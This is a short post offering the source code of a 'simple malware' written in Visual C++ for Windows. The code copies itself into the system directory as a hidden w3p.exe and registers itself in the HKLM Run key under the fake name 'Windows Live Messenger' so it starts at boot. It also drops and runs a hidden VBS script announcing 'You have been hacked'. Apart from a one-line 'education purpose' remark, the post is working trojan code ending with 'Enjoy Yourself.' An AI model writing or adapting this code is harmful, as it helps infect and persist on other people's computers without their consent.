Simple Malware

A simple malware coded in Visual C++. It will detect by antivirus(Kaspersky) as HEUR:Trojen:Win32. Even though use this for education purpose.

#include <stdio.h> #include <windows.h> void Regs(); void Vbs(); void w3p(); void Regs() { char system[MAX_PATH]; char path2file[MAX_PATH]; HMODULE GetModH=GetModuleHandle(NULL); GetModuleFileName(GetModH, path2file, sizeof(path2file)); GetSystemDirectory(system, sizeof(system)); strcat(system, "\\w3p.exe"); CopyFile(path2file,system,false); SetFileAttributes("w3p.exe", FILE_ATTRIBUTE_HIDDEN); HKEY hKey; RegOpenKeyEx(HKEY_LOCAL_MACHINE, "Software\\Microsoft\\Windows\\CurrentVersion\\Run",0,KEY_SET_VALUE, &hKey); RegSetValueEx(hKey, "Windows Live Messenger", 0, REG_SZ, (const unsigned char *)system, sizeof(system)); RegCloseKey(hKey); } void Vbs() { FILE *fp; fp=fopen("w3p.vbs", "w"); fprintf(fp, "MsgBox \"Hello, You have been hacked by w3p\""); ShellExecute(NULL, "open", "w3p.vbs", NULL,NULL, SW_SHOWNORMAL); SetFileAttributes("w3p.vbs", FILE_ATTRIBUTE_HIDDEN); } void w3p() { Regs(); Vbs(); } int main() { w3p(); return 0; }
Enjoy Yourself.